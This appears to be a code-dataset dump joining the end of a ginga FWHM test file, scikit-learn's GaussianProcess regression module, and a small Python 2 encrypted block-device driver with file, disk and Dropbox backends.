assert result_4.ensquared_energy_fn is None
result = self.iqcalc.objlist_select(
objlist, self.data.shape[1], self.data.shape[0])
assert len(result) == 1
result = self.iqcalc.objlist_select(
objlist, self.data.shape[1], self.data.shape[0], minfwhm=1.0, maxfwhm=2.0)
assert len(result) == 0
# NOTE: Inherited test methods also must satisfy inherited dependency checks
# from parent test class above. Not ideal if dependency is different but
# this avoids test code repetition.
@pytest.mark.skipif('not have_photutils')
class TestIQCalcPhotAstropy(TestIQCalcPhot):
def setup_class(self):
"""Customize for Astropy implementation."""
self.iqcalc = iqcalc_astropy.IQCalc(logger=self.logger)
@pytest.mark.skipif('not have_scipy')
class TestIQCalcFWHM:
# Shared attributes that subclass can access.
logger = logging.getLogger("TestIQCalc")
input_arrays = (
np.array([0., 0., 11., 12., 8., 9., 37., 96., 289., 786.,
1117., 795., 286., 86., 26., 18., 0., 8., 0., 0.]),
np.array([0., 9., 0., 0., 0., 34., 25., 60., 196., 602.,
1117., 1003., 413., 135., 29., 0., 3., 0., 4., 3.]))
def setup_class(self):
self.iqcalc = iqcalc.IQCalc(logger=self.logger)
self.fwhm_funcs = (self.iqcalc.calc_fwhm_gaussian,
self.iqcalc.calc_fwhm_moffat)
self.answers = ((2.8551, 2.7732), # Gaussian
(2.77949, 2.6735) # Moffat
)
def test_fwhm(self):
"""Test FWHM measuring function in 1D."""
for i, func in enumerate(self.fwhm_funcs):
for j, arr1d in enumerate(self.input_arrays):
res = func(arr1d)
assert_allclose(res.fwhm, self.answers[i][j], atol=1e-4)
class TestIQCalcFWHMAstropy(TestIQCalcFWHM):
def setup_class(self):
"""Customize for Astropy implementation."""
self.iqcalc = iqcalc_astropy.IQCalc(logger=self.logger)
self.fwhm_funcs = (self.iqcalc.calc_fwhm_gaussian,
self.iqcalc.calc_fwhm_moffat,
self.iqcalc.calc_fwhm_lorentz)
self.answers = ((2.8551, 2.7732), # Gaussian
(2.77949, 2.6735), # Moffat
(1.9570, 1.8113) # Lorentz
)
|
pllim/ginga
|
ginga/tests/test_iqcalc.py
|
Python
|
bsd-3-clause
| 12,829
|
[
"Gaussian"
] |
73dea002619e98992d78a50a3f3b53ddc88838de906ae081466c4cf27bfced66
|
# -*- coding: utf-8 -*-
# Author: Vincent Dubourg <vincent.dubourg@gmail.com>
# (mostly translation, see implementation details)
# Licence: BSD 3 clause
from __future__ import print_function
import numpy as np
from scipy import linalg, optimize
from ..base import BaseEstimator, RegressorMixin
from ..metrics.pairwise import manhattan_distances
from ..utils import check_random_state, check_array, check_X_y
from ..utils.validation import check_is_fitted
from . import regression_models as regression
from . import correlation_models as correlation
MACHINE_EPSILON = np.finfo(np.double).eps
def l1_cross_distances(X):
"""
Computes the nonzero componentwise L1 cross-distances between the vectors
in X.
Parameters
----------
X: array_like
An array with shape (n_samples, n_features)
Returns
-------
D: array with shape (n_samples * (n_samples - 1) / 2, n_features)
The array of componentwise L1 cross-distances.
ij: arrays with shape (n_samples * (n_samples - 1) / 2, 2)
The indices i and j of the vectors in X associated to the cross-
distances in D: D[k] = np.abs(X[ij[k, 0]] - Y[ij[k, 1]]).
"""
X = check_array(X)
n_samples, n_features = X.shape
n_nonzero_cross_dist = n_samples * (n_samples - 1) // 2
ij = np.zeros((n_nonzero_cross_dist, 2), dtype=np.int)
D = np.zeros((n_nonzero_cross_dist, n_features))
ll_1 = 0
for k in range(n_samples - 1):
ll_0 = ll_1
ll_1 = ll_0 + n_samples - k - 1
ij[ll_0:ll_1, 0] = k
ij[ll_0:ll_1, 1] = np.arange(k + 1, n_samples)
D[ll_0:ll_1] = np.abs(X[k] - X[(k + 1):n_samples])
return D, ij
class GaussianProcess(BaseEstimator, RegressorMixin):
"""The Gaussian Process model class.
Parameters
----------
regr : string or callable, optional
A regression function returning an array of outputs of the linear
regression functional basis. The number of observations n_samples
should be greater than the size p of this basis.
Default assumes a simple constant regression trend.
Available built-in regression models are::
'constant', 'linear', 'quadratic'
corr : string or callable, optional
A stationary autocorrelation function returning the autocorrelation
between two points x and x'.
Default assumes a squared-exponential autocorrelation model.
Built-in correlation models are::
'absolute_exponential', 'squared_exponential',
'generalized_exponential', 'cubic', 'linear'
beta0 : double array_like, optional
The regression weight vector to perform Ordinary Kriging (OK).
Default assumes Universal Kriging (UK) so that the vector beta of
regression weights is estimated using the maximum likelihood
principle.
storage_mode : string, optional
A string specifying whether the Cholesky decomposition of the
correlation matrix should be stored in the class (storage_mode =
'full') or not (storage_mode = 'light').
Default assumes storage_mode = 'full', so that the
Cholesky decomposition of the correlation matrix is stored.
This might be a useful parameter when one is not interested in the
MSE and only plan to estimate the BLUP, for which the correlation
matrix is not required.
verbose : boolean, optional
A boolean specifying the verbose level.
Default is verbose = False.
theta0 : double array_like, optional
An array with shape (n_features, ) or (1, ).
The parameters in the autocorrelation model.
If thetaL and thetaU are also specified, theta0 is considered as
the starting point for the maximum likelihood estimation of the
best set of parameters.
Default assumes isotropic autocorrelation model with theta0 = 1e-1.
thetaL : double array_like, optional
An array with shape matching theta0's.
Lower bound on the autocorrelation parameters for maximum
likelihood estimation.
Default is None, so that it skips maximum likelihood estimation and
it uses theta0.
thetaU : double array_like, optional
An array with shape matching theta0's.
Upper bound on the autocorrelation parameters for maximum
likelihood estimation.
Default is None, so that it skips maximum likelihood estimation and
it uses theta0.
normalize : boolean, optional
Input X and observations y are centered and reduced wrt
means and standard deviations estimated from the n_samples
observations provided.
Default is normalize = True so that data is normalized to ease
maximum likelihood estimation.
nugget : double or ndarray, optional
Introduce a nugget effect to allow smooth predictions from noisy
data. If nugget is an ndarray, it must be the same length as the
number of data points used for the fit.
The nugget is added to the diagonal of the assumed training covariance;
in this way it acts as a Tikhonov regularization in the problem. In
the special case of the squared exponential correlation function, the
nugget mathematically represents the variance of the input values.
Default assumes a nugget close to machine precision for the sake of
robustness (nugget = 10. * MACHINE_EPSILON).
optimizer : string, optional
A string specifying the optimization algorithm to be used.
Default uses 'fmin_cobyla' algorithm from scipy.optimize.
Available optimizers are::
'fmin_cobyla', 'Welch'
'Welch' optimizer is dued to Welch et al., see reference [WBSWM1992]_.
It consists in iterating over several one-dimensional optimizations
instead of running one single multi-dimensional optimization.
random_start : int, optional
The number of times the Maximum Likelihood Estimation should be
performed from a random starting point.
The first MLE always uses the specified starting point (theta0),
the next starting points are picked at random according to an
exponential distribution (log-uniform on [thetaL, thetaU]).
Default does not use random starting point (random_start = 1).
random_state: integer or numpy.RandomState, optional
The generator used to shuffle the sequence of coordinates of theta in
the Welch optimizer. If an integer is given, it fixes the seed.
Defaults to the global numpy random number generator.
Attributes
----------
theta_ : array
Specified theta OR the best set of autocorrelation parameters (the \
sought maximizer of the reduced likelihood function).
reduced_likelihood_function_value_ : array
The optimal reduced likelihood function value.
Examples
--------
>>> import numpy as np
>>> from sklearn.gaussian_process import GaussianProcess
>>> X = np.array([[1., 3., 5., 6., 7., 8.]]).T
>>> y = (X * np.sin(X)).ravel()
>>> gp = GaussianProcess(theta0=0.1, thetaL=.001, thetaU=1.)
>>> gp.fit(X, y) # doctest: +ELLIPSIS
GaussianProcess(beta0=None...
...
Notes
-----
The presentation implementation is based on a translation of the DACE
Matlab toolbox, see reference [NLNS2002]_.
References
----------
.. [NLNS2002] `H.B. Nielsen, S.N. Lophaven, H. B. Nielsen and J.
Sondergaard. DACE - A MATLAB Kriging Toolbox.` (2002)
http://www2.imm.dtu.dk/~hbn/dace/dace.pdf
.. [WBSWM1992] `W.J. Welch, R.J. Buck, J. Sacks, H.P. Wynn, T.J. Mitchell,
and M.D. Morris (1992). Screening, predicting, and computer
experiments. Technometrics, 34(1) 15--25.`
http://www.jstor.org/pss/1269548
"""
_regression_types = {
'constant': regression.constant,
'linear': regression.linear,
'quadratic': regression.quadratic}
_correlation_types = {
'absolute_exponential': correlation.absolute_exponential,
'squared_exponential': correlation.squared_exponential,
'generalized_exponential': correlation.generalized_exponential,
'cubic': correlation.cubic,
'linear': correlation.linear}
_optimizer_types = [
'fmin_cobyla',
'Welch']
def __init__(self, regr='constant', corr='squared_exponential', beta0=None,
storage_mode='full', verbose=False, theta0=1e-1,
thetaL=None, thetaU=None, optimizer='fmin_cobyla',
random_start=1, normalize=True,
nugget=10. * MACHINE_EPSILON, random_state=None):
self.regr = regr
self.corr = corr
self.beta0 = beta0
self.storage_mode = storage_mode
self.verbose = verbose
self.theta0 = theta0
self.thetaL = thetaL
self.thetaU = thetaU
self.normalize = normalize
self.nugget = nugget
self.optimizer = optimizer
self.random_start = random_start
self.random_state = random_state
def fit(self, X, y):
"""
The Gaussian Process model fitting method.
Parameters
----------
X : double array_like
An array with shape (n_samples, n_features) with the input at which
observations were made.
y : double array_like
An array with shape (n_samples, ) or shape (n_samples, n_targets)
with the observations of the output to be predicted.
Returns
-------
gp : self
A fitted Gaussian Process model object awaiting data to perform
predictions.
"""
# Run input checks
self._check_params()
self.random_state = check_random_state(self.random_state)
# Force data to 2D numpy.array
X, y = check_X_y(X, y, multi_output=True, y_numeric=True)
self.y_ndim_ = y.ndim
if y.ndim == 1:
y = y[:, np.newaxis]
# Check shapes of DOE & observations
n_samples, n_features = X.shape
_, n_targets = y.shape
# Run input checks
self._check_params(n_samples)
# Normalize data or don't
if self.normalize:
X_mean = np.mean(X, axis=0)
X_std = np.std(X, axis=0)
y_mean = np.mean(y, axis=0)
y_std = np.std(y, axis=0)
X_std[X_std == 0.] = 1.
y_std[y_std == 0.] = 1.
# center and scale X if necessary
X = (X - X_mean) / X_std
y = (y - y_mean) / y_std
else:
X_mean = np.zeros(1)
X_std = np.ones(1)
y_mean = np.zeros(1)
y_std = np.ones(1)
# Calculate matrix of distances D between samples
D, ij = l1_cross_distances(X)
if (np.min(np.sum(D, axis=1)) == 0.
and self.corr != correlation.pure_nugget):
raise Exception("Multiple input features cannot have the same"
" target value.")
# Regression matrix and parameters
F = self.regr(X)
n_samples_F = F.shape[0]
if F.ndim > 1:
p = F.shape[1]
else:
p = 1
if n_samples_F != n_samples:
raise Exception("Number of rows in F and X do not match. Most "
"likely something is going wrong with the "
"regression model.")
if p > n_samples_F:
raise Exception(("Ordinary least squares problem is undetermined "
"n_samples=%d must be greater than the "
"regression model size p=%d.") % (n_samples, p))
if self.beta0 is not None:
if self.beta0.shape[0] != p:
raise Exception("Shapes of beta0 and F do not match.")
# Set attributes
self.X = X
self.y = y
self.D = D
self.ij = ij
self.F = F
self.X_mean, self.X_std = X_mean, X_std
self.y_mean, self.y_std = y_mean, y_std
# Determine Gaussian Process model parameters
if self.thetaL is not None and self.thetaU is not None:
# Maximum Likelihood Estimation of the parameters
if self.verbose:
print("Performing Maximum Likelihood Estimation of the "
"autocorrelation parameters...")
self.theta_, self.reduced_likelihood_function_value_, par = \
self._arg_max_reduced_likelihood_function()
if np.isinf(self.reduced_likelihood_function_value_):
raise Exception("Bad parameter region. "
"Try increasing upper bound")
else:
# Given parameters
if self.verbose:
print("Given autocorrelation parameters. "
"Computing Gaussian Process model parameters...")
self.theta_ = self.theta0
self.reduced_likelihood_function_value_, par = \
self.reduced_likelihood_function()
if np.isinf(self.reduced_likelihood_function_value_):
raise Exception("Bad point. Try increasing theta0.")
self.beta = par['beta']
self.gamma = par['gamma']
self.sigma2 = par['sigma2']
self.C = par['C']
self.Ft = par['Ft']
self.G = par['G']
if self.storage_mode == 'light':
# Delete heavy data (it will be computed again if required)
# (it is required only when MSE is wanted in self.predict)
if self.verbose:
print("Light storage mode specified. "
"Flushing autocorrelation matrix...")
self.D = None
self.ij = None
self.F = None
self.C = None
self.Ft = None
self.G = None
return self
def predict(self, X, eval_MSE=False, batch_size=None):
"""
This function evaluates the Gaussian Process model at x.
Parameters
----------
X : array_like
An array with shape (n_eval, n_features) giving the point(s) at
which the prediction(s) should be made.
eval_MSE : boolean, optional
A boolean specifying whether the Mean Squared Error should be
evaluated or not.
Default assumes evalMSE = False and evaluates only the BLUP (mean
prediction).
batch_size : integer, optional
An integer giving the maximum number of points that can be
evaluated simultaneously (depending on the available memory).
Default is None so that all given points are evaluated at the same
time.
Returns
-------
y : array_like, shape (n_samples, ) or (n_samples, n_targets)
An array with shape (n_eval, ) if the Gaussian Process was trained
on an array of shape (n_samples, ) or an array with shape
(n_eval, n_targets) if the Gaussian Process was trained on an array
of shape (n_samples, n_targets) with the Best Linear Unbiased
Prediction at x.
MSE : array_like, optional (if eval_MSE == True)
An array with shape (n_eval, ) or (n_eval, n_targets) as with y,
with the Mean Squared Error at x.
"""
check_is_fitted(self, "X")
# Check input shapes
X = check_array(X)
n_eval, _ = X.shape
n_samples, n_features = self.X.shape
n_samples_y, n_targets = self.y.shape
# Run input checks
self._check_params(n_samples)
if X.shape[1] != n_features:
raise ValueError(("The number of features in X (X.shape[1] = %d) "
"should match the number of features used "
"for fit() "
"which is %d.") % (X.shape[1], n_features))
if batch_size is None:
# No memory management
# (evaluates all given points in a single batch run)
# Normalize input
X = (X - self.X_mean) / self.X_std
# Initialize output
y = np.zeros(n_eval)
if eval_MSE:
MSE = np.zeros(n_eval)
# Get pairwise componentwise L1-distances to the input training set
dx = manhattan_distances(X, Y=self.X, sum_over_features=False)
# Get regression function and correlation
f = self.regr(X)
r = self.corr(self.theta_, dx).reshape(n_eval, n_samples)
# Scaled predictor
y_ = np.dot(f, self.beta) + np.dot(r, self.gamma)
# Predictor
y = (self.y_mean + self.y_std * y_).reshape(n_eval, n_targets)
if self.y_ndim_ == 1:
y = y.ravel()
# Mean Squared Error
if eval_MSE:
C = self.C
if C is None:
# Light storage mode (need to recompute C, F, Ft and G)
if self.verbose:
print("This GaussianProcess used 'light' storage mode "
"at instantiation. Need to recompute "
"autocorrelation matrix...")
reduced_likelihood_function_value, par = \
self.reduced_likelihood_function()
self.C = par['C']
self.Ft = par['Ft']
self.G = par['G']
rt = linalg.solve_triangular(self.C, r.T, lower=True)
if self.beta0 is None:
# Universal Kriging
u = linalg.solve_triangular(self.G.T,
np.dot(self.Ft.T, rt) - f.T,
lower=True)
else:
# Ordinary Kriging
u = np.zeros((n_targets, n_eval))
MSE = np.dot(self.sigma2.reshape(n_targets, 1),
(1. - (rt ** 2.).sum(axis=0)
+ (u ** 2.).sum(axis=0))[np.newaxis, :])
MSE = np.sqrt((MSE ** 2.).sum(axis=0) / n_targets)
# Mean Squared Error might be slightly negative depending on
# machine precision: force to zero!
MSE[MSE < 0.] = 0.
if self.y_ndim_ == 1:
MSE = MSE.ravel()
return y, MSE
else:
return y
else:
# Memory management
if type(batch_size) is not int or batch_size <= 0:
raise Exception("batch_size must be a positive integer")
if eval_MSE:
y, MSE = np.zeros(n_eval), np.zeros(n_eval)
for k in range(max(1, n_eval / batch_size)):
batch_from = k * batch_size
batch_to = min([(k + 1) * batch_size + 1, n_eval + 1])
y[batch_from:batch_to], MSE[batch_from:batch_to] = \
self.predict(X[batch_from:batch_to],
eval_MSE=eval_MSE, batch_size=None)
return y, MSE
else:
y = np.zeros(n_eval)
for k in range(max(1, n_eval / batch_size)):
batch_from = k * batch_size
batch_to = min([(k + 1) * batch_size + 1, n_eval + 1])
y[batch_from:batch_to] = \
self.predict(X[batch_from:batch_to],
eval_MSE=eval_MSE, batch_size=None)
return y
def reduced_likelihood_function(self, theta=None):
"""
This function determines the BLUP parameters and evaluates the reduced
likelihood function for the given autocorrelation parameters theta.
Maximizing this function wrt the autocorrelation parameters theta is
equivalent to maximizing the likelihood of the assumed joint Gaussian
distribution of the observations y evaluated onto the design of
experiments X.
Parameters
----------
theta : array_like, optional
An array containing the autocorrelation parameters at which the
Gaussian Process model parameters should be determined.
Default uses the built-in autocorrelation parameters
(ie ``theta = self.theta_``).
Returns
-------
reduced_likelihood_function_value : double
The value of the reduced likelihood function associated to the
given autocorrelation parameters theta.
par : dict
A dictionary containing the requested Gaussian Process model
parameters:
sigma2
Gaussian Process variance.
beta
Generalized least-squares regression weights for
Universal Kriging or given beta0 for Ordinary
Kriging.
gamma
Gaussian Process weights.
C
Cholesky decomposition of the correlation matrix [R].
Ft
Solution of the linear equation system : [R] x Ft = F
G
QR decomposition of the matrix Ft.
"""
check_is_fitted(self, "X")
if theta is None:
# Use built-in autocorrelation parameters
theta = self.theta_
# Initialize output
reduced_likelihood_function_value = - np.inf
par = {}
# Retrieve data
n_samples = self.X.shape[0]
D = self.D
ij = self.ij
F = self.F
if D is None:
# Light storage mode (need to recompute D, ij and F)
D, ij = l1_cross_distances(self.X)
if (np.min(np.sum(D, axis=1)) == 0.
and self.corr != correlation.pure_nugget):
raise Exception("Multiple X are not allowed")
F = self.regr(self.X)
# Set up R
r = self.corr(theta, D)
R = np.eye(n_samples) * (1. + self.nugget)
R[ij[:, 0], ij[:, 1]] = r
R[ij[:, 1], ij[:, 0]] = r
# Cholesky decomposition of R
try:
C = linalg.cholesky(R, lower=True)
except linalg.LinAlgError:
return reduced_likelihood_function_value, par
# Get generalized least squares solution
Ft = linalg.solve_triangular(C, F, lower=True)
try:
Q, G = linalg.qr(Ft, econ=True)
except:
#/usr/lib/python2.6/dist-packages/scipy/linalg/decomp.py:1177:
# DeprecationWarning: qr econ argument will be removed after scipy
# 0.7. The economy transform will then be available through the
# mode='economic' argument.
Q, G = linalg.qr(Ft, mode='economic')
pass
sv = linalg.svd(G, compute_uv=False)
rcondG = sv[-1] / sv[0]
if rcondG < 1e-10:
# Check F
sv = linalg.svd(F, compute_uv=False)
condF = sv[0] / sv[-1]
if condF > 1e15:
raise Exception("F is too ill conditioned. Poor combination "
"of regression model and observations.")
else:
# Ft is too ill conditioned, get out (try different theta)
return reduced_likelihood_function_value, par
Yt = linalg.solve_triangular(C, self.y, lower=True)
if self.beta0 is None:
# Universal Kriging
beta = linalg.solve_triangular(G, np.dot(Q.T, Yt))
else:
# Ordinary Kriging
beta = np.array(self.beta0)
rho = Yt - np.dot(Ft, beta)
sigma2 = (rho ** 2.).sum(axis=0) / n_samples
# The determinant of R is equal to the squared product of the diagonal
# elements of its Cholesky decomposition C
detR = (np.diag(C) ** (2. / n_samples)).prod()
# Compute/Organize output
reduced_likelihood_function_value = - sigma2.sum() * detR
par['sigma2'] = sigma2 * self.y_std ** 2.
par['beta'] = beta
par['gamma'] = linalg.solve_triangular(C.T, rho)
par['C'] = C
par['Ft'] = Ft
par['G'] = G
return reduced_likelihood_function_value, par
def _arg_max_reduced_likelihood_function(self):
"""
This function estimates the autocorrelation parameters theta as the
maximizer of the reduced likelihood function.
(Minimization of the opposite reduced likelihood function is used for
convenience)
Parameters
----------
self : All parameters are stored in the Gaussian Process model object.
Returns
-------
optimal_theta : array_like
The best set of autocorrelation parameters (the sought maximizer of
the reduced likelihood function).
optimal_reduced_likelihood_function_value : double
The optimal reduced likelihood function value.
optimal_par : dict
The BLUP parameters associated to thetaOpt.
"""
# Initialize output
best_optimal_theta = []
best_optimal_rlf_value = []
best_optimal_par = []
if self.verbose:
print("The chosen optimizer is: " + str(self.optimizer))
if self.random_start > 1:
print(str(self.random_start) + " random starts are required.")
percent_completed = 0.
# Force optimizer to fmin_cobyla if the model is meant to be isotropic
if self.optimizer == 'Welch' and self.theta0.size == 1:
self.optimizer = 'fmin_cobyla'
if self.optimizer == 'fmin_cobyla':
def minus_reduced_likelihood_function(log10t):
return - self.reduced_likelihood_function(
theta=10. ** log10t)[0]
constraints = []
for i in range(self.theta0.size):
constraints.append(lambda log10t, i=i:
log10t[i] - np.log10(self.thetaL[0, i]))
constraints.append(lambda log10t, i=i:
np.log10(self.thetaU[0, i]) - log10t[i])
for k in range(self.random_start):
if k == 0:
# Use specified starting point as first guess
theta0 = self.theta0
else:
# Generate a random starting point log10-uniformly
# distributed between bounds
log10theta0 = np.log10(self.thetaL) \
+ self.random_state.rand(self.theta0.size).reshape(
self.theta0.shape) * np.log10(self.thetaU
/ self.thetaL)
theta0 = 10. ** log10theta0
# Run Cobyla
try:
log10_optimal_theta = \
optimize.fmin_cobyla(minus_reduced_likelihood_function,
np.log10(theta0), constraints,
iprint=0)
except ValueError as ve:
print("Optimization failed. Try increasing the ``nugget``")
raise ve
optimal_theta = 10. ** log10_optimal_theta
optimal_rlf_value, optimal_par = \
self.reduced_likelihood_function(theta=optimal_theta)
# Compare the new optimizer to the best previous one
if k > 0:
if optimal_rlf_value > best_optimal_rlf_value:
best_optimal_rlf_value = optimal_rlf_value
best_optimal_par = optimal_par
best_optimal_theta = optimal_theta
else:
best_optimal_rlf_value = optimal_rlf_value
best_optimal_par = optimal_par
best_optimal_theta = optimal_theta
if self.verbose and self.random_start > 1:
if (20 * k) / self.random_start > percent_completed:
percent_completed = (20 * k) / self.random_start
print("%s completed" % (5 * percent_completed))
optimal_rlf_value = best_optimal_rlf_value
optimal_par = best_optimal_par
optimal_theta = best_optimal_theta
elif self.optimizer == 'Welch':
# Backup of the given atrributes
theta0, thetaL, thetaU = self.theta0, self.thetaL, self.thetaU
corr = self.corr
verbose = self.verbose
# This will iterate over fmin_cobyla optimizer
self.optimizer = 'fmin_cobyla'
self.verbose = False
# Initialize under isotropy assumption
if verbose:
print("Initialize under isotropy assumption...")
self.theta0 = check_array(self.theta0.min())
self.thetaL = check_array(self.thetaL.min())
self.thetaU = check_array(self.thetaU.max())
theta_iso, optimal_rlf_value_iso, par_iso = \
self._arg_max_reduced_likelihood_function()
optimal_theta = theta_iso + np.zeros(theta0.shape)
# Iterate over all dimensions of theta allowing for anisotropy
if verbose:
print("Now improving allowing for anisotropy...")
for i in self.random_state.permutation(theta0.size):
if verbose:
print("Proceeding along dimension %d..." % (i + 1))
self.theta0 = check_array(theta_iso)
self.thetaL = check_array(thetaL[0, i])
self.thetaU = check_array(thetaU[0, i])
def corr_cut(t, d):
return corr(check_array(np.hstack([optimal_theta[0][0:i],
t[0],
optimal_theta[0][(i +
1)::]])),
d)
self.corr = corr_cut
optimal_theta[0, i], optimal_rlf_value, optimal_par = \
self._arg_max_reduced_likelihood_function()
# Restore the given atrributes
self.theta0, self.thetaL, self.thetaU = theta0, thetaL, thetaU
self.corr = corr
self.optimizer = 'Welch'
self.verbose = verbose
else:
raise NotImplementedError("This optimizer ('%s') is not "
"implemented yet. Please contribute!"
% self.optimizer)
return optimal_theta, optimal_rlf_value, optimal_par
def _check_params(self, n_samples=None):
# Check regression model
if not callable(self.regr):
if self.regr in self._regression_types:
self.regr = self._regression_types[self.regr]
else:
raise ValueError("regr should be one of %s or callable, "
"%s was given."
% (self._regression_types.keys(), self.regr))
# Check regression weights if given (Ordinary Kriging)
if self.beta0 is not None:
self.beta0 = check_array(self.beta0)
if self.beta0.shape[1] != 1:
# Force to column vector
self.beta0 = self.beta0.T
# Check correlation model
if not callable(self.corr):
if self.corr in self._correlation_types:
self.corr = self._correlation_types[self.corr]
else:
raise ValueError("corr should be one of %s or callable, "
"%s was given."
% (self._correlation_types.keys(), self.corr))
# Check storage mode
if self.storage_mode != 'full' and self.storage_mode != 'light':
raise ValueError("Storage mode should either be 'full' or "
"'light', %s was given." % self.storage_mode)
# Check correlation parameters
self.theta0 = check_array(self.theta0)
lth = self.theta0.size
if self.thetaL is not None and self.thetaU is not None:
self.thetaL = check_array(self.thetaL)
self.thetaU = check_array(self.thetaU)
if self.thetaL.size != lth or self.thetaU.size != lth:
raise ValueError("theta0, thetaL and thetaU must have the "
"same length.")
if np.any(self.thetaL <= 0) or np.any(self.thetaU < self.thetaL):
raise ValueError("The bounds must satisfy O < thetaL <= "
"thetaU.")
elif self.thetaL is None and self.thetaU is None:
if np.any(self.theta0 <= 0):
raise ValueError("theta0 must be strictly positive.")
elif self.thetaL is None or self.thetaU is None:
raise ValueError("thetaL and thetaU should either be both or "
"neither specified.")
# Force verbose type to bool
self.verbose = bool(self.verbose)
# Force normalize type to bool
self.normalize = bool(self.normalize)
# Check nugget value
self.nugget = np.asarray(self.nugget)
if np.any(self.nugget) < 0.:
raise ValueError("nugget must be positive or zero.")
if (n_samples is not None
and self.nugget.shape not in [(), (n_samples,)]):
raise ValueError("nugget must be either a scalar "
"or array of length n_samples.")
# Check optimizer
if self.optimizer not in self._optimizer_types:
raise ValueError("optimizer should be one of %s"
% self._optimizer_types)
# Force random_start type to int
self.random_start = int(self.random_start)
|
shikhardb/scikit-learn
|
sklearn/gaussian_process/gaussian_process.py
|
Python
|
bsd-3-clause
| 34,542
|
[
"Gaussian"
] |
ac4fd1a44c41b98062481f9f79194d7b1b5a7e4f50a27a9229ddc4e4ab3441d1
|
import os
import struct
import logging
from collections import deque
from dropbox import client, rest, session
from StringIO import StringIO
from util import *
import re
from appkeys import *
#use /dev/random if security matters
class WrongDiskSize(Exception):
def __init__(self,message):
super(WrongDiskSize, self).__init__()
self.message=message
#TODO: should inherit after EncryptedBlockDevice
class DiskDriver(object):
#TODO: use *args and **kwargs
def __init__(self,size,sector_size):
logging.basicConfig(filename='blockcrypt.log',level=logging.DEBUG)
self.size = size
self.sector_size = sector_size
self.logger = logging.getLogger("blockcrypt")
if size % sector_size != 0:
print "DD init received %d %d" %(size,sector_size)
raise WrongDiskSize("disk size must the multiple of sector size %d %d" % (size,sector_size))
def read(self,sector):
pass
def write(self,data):
pass
def flush(self):
pass
@staticmethod
def create_disk():
pass
class FileBasedDiskDriver(DiskDriver):
def __init__(self,fp,size,sector_size,disk_begin=0):
super(FileBasedDiskDriver,self).__init__(size,sector_size)
self.fp = fp
self.disk_begin = disk_begin
def write(self,sector,data):
offset = self.sector_size*sector+self.disk_begin
self.logger.debug("FDD: write %d data at %d, sector: %d",len(data),offset,sector)
self.fp.seek(offset)
self.fp.write(data)
def read(self,sector):
offset = self.sector_size*sector+self.disk_begin
self.fp.seek(offset)
self.logger.debug("FDD: read offset %d, sector %d, tell %d", offset,sector,self.fp.tell())
buf = self.fp.read(self.sector_size)
return buf
#TODO: source should be random, urandom is for speed
def flush(self):
self.fp.flush()
class FileDiskDriver(FileBasedDiskDriver):
def __init__(self,filename):
fp = open(filename,"r+b")
(size,sector_size,disk_begin) = self.read_disk_info(filename)
super(FileDiskDriver,self).__init__(fp,size,sector_size,disk_begin)
@staticmethod
def read_disk_info(filename):
fp = open(filename,'rb')
info_size = struct.calcsize('Q')
info = fp.read(info_size)
disk_begin = info_size
size = os.stat(filename).st_size - info_size
fp.close()
sector_size = struct.unpack('Q', info)[0]
return (size,sector_size,disk_begin)
@staticmethod
def create_disk(filename, disk_size,sector_size,rand_source='/dev/urandom'):
fp = open(filename, "wb")
header = struct.pack('Q', sector_size)
fp.write(header)
left = disk_size
while left > 0:
if left % sector_size==0:
to_read=sector_size
else:
to_read=left
data = get_random_sector(sector_size,rand_source)
fp.write(data)
left-=to_read
fp.flush()
fp.close()
class HDDDiskDriver(FileBasedDiskDriver):
def __init__(self,disk):
fp = open(disk,'r+b')
(size,sector_size) = self.get_sector_size(disk)
super(HDDDiskDriver,self).__init__(fp,size,sector_size)
def get_sector_size(disk):
dev = disk.split('/')[-1]
name = re.sub("[^a-zA-Z]", "", dev)
path = "/sys/block"+name
sector_size = int(open(path+"/queue/hw_sector_size",'r').read())
size = int(open(path+dev+"size","r").read())
return (size,sector_size)
class CachedDiskDriver(DiskDriver):
#TODO: change to *args & **kwargs
"""
the unit of cache_size is number of sectors
"""
def __init__(self,size,sector_size,cache_size):
super(CachedDiskDriver,self).__init__(size,sector_size)
print "cached init called"
self.sectors_accessed = deque()
self.sector_cache = {}
self.cache_size = cache_size
def read(self,sector):
sector_cache = self.sector_cache
sectors_accessed=self.sectors_accessed
if sector in sector_cache:
self.update_sector_status(sector)
data = sector_cache[sector]
else:
self.make_space()
data = self.get_sector(sector)
sector_cache[sector]=data
sectors_accessed.appendleft(sector)
return data
def write(self,sector,data):
sector_cache = self.sector_cache
sectors_accessed=self.sectors_accessed
if sector in sector_cache:
self.update_sector_status(sector)
sector_cache[sector]=data
else:
self.make_space()
sector_cache[sector]=data
sectors_accessed.appendleft(sector)
def update_sector_status(self,sector):
self.sectors_accessed.remove(sector)
self.sectors_accessed.appendleft(sector)
def make_space(self):
if len(self.sectors_accessed) > self.cache_size:
self.uncache_last()
def uncache_last(self,sector):
sector = self.sectors_accessed.pop()
data = self.sector_cache.pop(sector)
self.write_sector(sector,data)
def flush(self):
sector_cache = self.sector_cache
sectors_accessed=self.sectors_accessed
for i in sectors_accessed:
self.write_sector(sector,sector_cache[sector])
def get_sector(self,sector):
pass
def write_sector(self,sector,data):
pass
class DropboxDiskDriver(CachedDiskDriver):
def __init__(self,cache_size):
self.authenticate()
#bit sloppy but shouldnt be able to lead to a significant attack
self.cache_size = cache_size
try:
f,meta = self.client.get_file_and_metadata("/config")
hack = StringIO(f.read())
hack.seek(0)
size = int(hack.readline())
sector_size = int(hack.readline())
super(DropboxDiskDriver,self).__init__(size,sector_size,cache_size)
f.close()
except rest.ErrorResponse:
print "config doesnt exist on server"
super(DropboxDiskDriver,self).__init__(0,1,cache_size)
pass
def get_sector(self,sector):
f, metadata = self.client.get_file_and_metadata(self.get_sector_name(sector))
data = f.read(self.sector_size)
f.close()
return data
def write_sector(self,sector,data):
f = StringIO(data)
self.client.put_file(self.get_sector_name(sector), f)
def get_sector_name(self,sector):
sector_name = '/'+str(sector)
return sector_name
def authenticate(self):
ACCESS_TYPE='dropbox'
sess = session.DropboxSession(APP_KEY, APP_SECRET, ACCESS_TYPE)
request_token = sess.obtain_request_token()
url = sess.build_authorize_url(request_token)
print "url:", url
print "Please visit this website and press the 'Allow' button, then hit 'Enter' here."
raw_input()
access_token = sess.obtain_access_token(request_token)
self.client = client.DropboxClient(sess)
def create_disk(self,size,sector_size,rand_source='/dev/urandom'):
config = StringIO()
s = "%d\n%d" %(size,sector_size)
config.write(s)
config.seek(0)
self.client.put_file("/config", config)
for i in range(0,int(size/sector_size)):
s = get_random_sector(sector_size,rand_source)
self.write_sector(i,s)
self.size = size
